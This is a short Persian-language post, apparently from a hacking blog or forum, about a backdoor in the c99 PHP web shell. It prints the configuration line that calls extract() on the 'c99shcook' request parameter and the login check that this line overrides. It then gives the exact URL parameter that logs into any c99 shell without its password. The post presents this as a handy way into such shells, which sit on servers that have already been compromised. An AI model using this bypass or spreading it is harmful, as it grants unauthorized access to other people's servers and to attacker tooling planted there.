خیلی وقت بود که حرف هایی از وجود در پشتی در شل اسکریپت c99 زده میشد ! بعد مدتی وجود این در پشتی در این شل توسط سایت هایی مثل TheHackerBlog تایید شد !

با استفاده از این در پشتی (backdoor) میشه بدون داشتن پسورد شل به اون وارد شد

شل c99 بدون شک یکی از بهترین و معروف ترین شل ها هست که افراد زیادی با اون کار میکنن

کد بکدور به این صورت است :[php] //Highlight-code colors
$highlight_background="#c0c0c0";
$highlight_bg ="#FFFFFF"
$highlight_bg ="#FFFFFF";
$highlight_comment ="#6A6A6A";
$highlight_default ="#0000BB";
$highlight_html ="#1300FF";
$highlight_keyword ="#007700";
$highlight_string ="#000000";
@$f=$_REQUEST["f"];
<strong>@extract($_REQUEST["c99shcook"]);</strong>
//END CONFIGURATION
$tmp=array();[/php]
نویسنده ی این شل از این کد برای عبور از پسورد شل استفاده کرده :[php]if ($login) {
if (empty($md5_pass)) {
$md5_pass = md5($pass);
}
if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
if ($login_txt === false) {
$login_txt = "";
} elseif (empty($login_txt)) {
$login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html));
}
header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");
header("HTTP/1.0 401 Unauthorized");
exit($accessdeniedmess);
}
}
[/php]اصل کار خیلی سادس ! با اضافه کردن این url به شل میتونیم وارد بشیم [php]/c99.php?c99shcook[login]=0[/php]